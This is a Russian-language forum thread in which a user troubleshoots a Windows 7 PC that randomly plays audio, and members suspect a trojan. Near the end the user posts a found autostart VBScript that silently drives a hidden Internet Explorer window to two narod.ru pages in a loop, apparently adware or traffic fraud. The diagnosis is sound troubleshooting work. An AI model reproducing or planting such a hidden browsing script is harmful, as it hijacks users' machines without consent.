Фигня какая-то. Уже месяца 3 один из двух компов на винде 7 при подключенном инете несколько раз в день включает и играет что-то похожее на интернет радио. То есть иногда музыка, иногда голос. Через секунд 15-20 выключается. Куда копать, чтобы избавиться от этого?
Слышу не только я один, но еще и жена
Здравствуйте, FireShock, Вы писали:
FS>Фигня какая-то. Уже месяца 3 один из двух компов на винде 7 при подключенном инете несколько раз в день включает и играет что-то похожее на интернет радио. То есть иногда музыка, иногда голос. Через секунд 15-20 выключается. Куда копать, чтобы избавиться от этого? FS>Слышу не только я один, но еще и жена
А если комп на другое место поставить? Может, есть какая-то хитрая наводка из проводной сети радио или еще откуда-то?
Здравствуйте, Au1, Вы писали:
Au1>А если комп на другое место поставить? Может, есть какая-то хитрая наводка из проводной сети радио или еще откуда-то?
Не, точно не это. Качество на слух — как мрз 128 кб/с.
FS>Фигня какая-то. Уже месяца 3 один из двух компов на винде 7 при подключенном инете несколько раз в день включает и играет что-то похожее на интернет радио. То есть иногда музыка, иногда голос. Через секунд 15-20 выключается. Куда копать, чтобы избавиться от этого? FS>Слышу не только я один, но еще и жена
Ставь линух, там скорее всего звук пахать не будет.
FS>Слышу не только я один, но еще и жена
Откуда знаешь, что это комп, а не соседи радио слушают?
Все эмоциональные формулировки не соотвествуют действительному положению вещей и приведены мной исключительно "ради красного словца". За корректными формулировками и неискажённым изложением идей, следует обращаться к их автором или воспользоваться поиском
FS>Уже месяца 3 один из двух компов на винде 7 при подключенном инете несколько раз в день включает и играет что-то похожее на интернет радио.
Боян? Троян?
Обязательно бахнем! И не раз. Весь мир в труху! Но потом. (ДМБ)
гня какая-то. Уже месяца 3 один из двух компов на винде 7 при подключенном инете несколько раз в день включает и играет что-то похожее на интернет радио.
Гы гы дай угадаю, открыт браузер а там наверно мерянно немерянно закладок.
Вот среди них есть какой то флеш банер.
У меня тоже так было, ни с того ни с сего — звук то открывающийся двери то закрывающийся.
Анекдот старый вспомнился:
Хакер приходит к специалисту по паранормальным явлениям:
— Доктор, помогите мне! У меня дома такое творится. Диски по комнате летают, сами в компьютер ставятся и Windows устанавливают!
— У-у! Батенька, да у вас полтерГейтс!
Здравствуйте, nen777w, Вы писали:
N>Гы гы дай угадаю, открыт браузер а там наверно мерянно немерянно закладок. N>Вот среди них есть какой то флеш банер. N>У меня тоже так было, ни с того ни с сего — звук то открывающийся двери то закрывающийся.
Браузеры закрыты. Все временные файлы и куки удалены. Но все равно включается музыка.
FS>Уже месяца 3 один из двух компов на винде 7 при подключенном инете несколько раз в день включает и играет что-то похожее на интернет радио.
- Поправился товарищ Комманд Ком, — произнес Диггер, рассматривая проходящего мимо товарища Кома.
— На 2.7 кило, — определил командир Нортон.
— Так какую песню мы сегодня будем петь, Нортон? — спросил Диггер.
— Дык, — отвечал командир Нортон, — Янки Дудль.
Надо еще смотреть, что у тебя там в автозагрузке и в службах прописалось. Мое скромное имхо — комп затроянен, возможно, входит в какой-то ботнет, отсюда и музло периодическое.
Это какой-то троян? В гугле пока не найду, что это. Кто-то говорит, что этот файл появился после установки PDF Creator.
В службах висит.
F>2. taskhost.exe (под вопросом);
F>3. C:\Windows\Temp\1.vbs. F>Пункт 3 особо интересен, шо там за скрипт?
On Error Resume Next
Set oIE = WScript.CreateObject("InternetExplorer.Application")
do
oIE.visible = 0
oIE.navigate "http://google-referatov.narod.ru/works2/UA-1-1-0000001.html"
WScript.Sleep 300000
oIE.navigate "http://bissnessite.narod.ru/serf.html"
WScript.Sleep 300000
loop
Он в автозагрузке прописан. Что за ссылки — не знаю.
F>Надо еще смотреть, что у тебя там в автозагрузке и в службах прописалось. Мое скромное имхо — комп затроянен, возможно, входит в какой-то ботнет, отсюда и музло периодическое.
FS>Здравствуйте, Flamer, Вы писали:
F>>1. C:\Program Files\Application Updater\ApplicationUpdater.exe;
FS>Это какой-то троян? В гугле пока не найду, что это. Кто-то говорит, что этот файл появился после установки PDF Creator. FS>В службах висит.
Здравствуйте, Flamer, Вы писали:
F>Ну вот и оно — периодические запросы левых страниц, на них звуки могут быть как раз.
Интересно, откуда взялся этот скрипт.
F>И еще — отключите в браузерах плагины для работы с PDF — это та еще дыра.
ОК.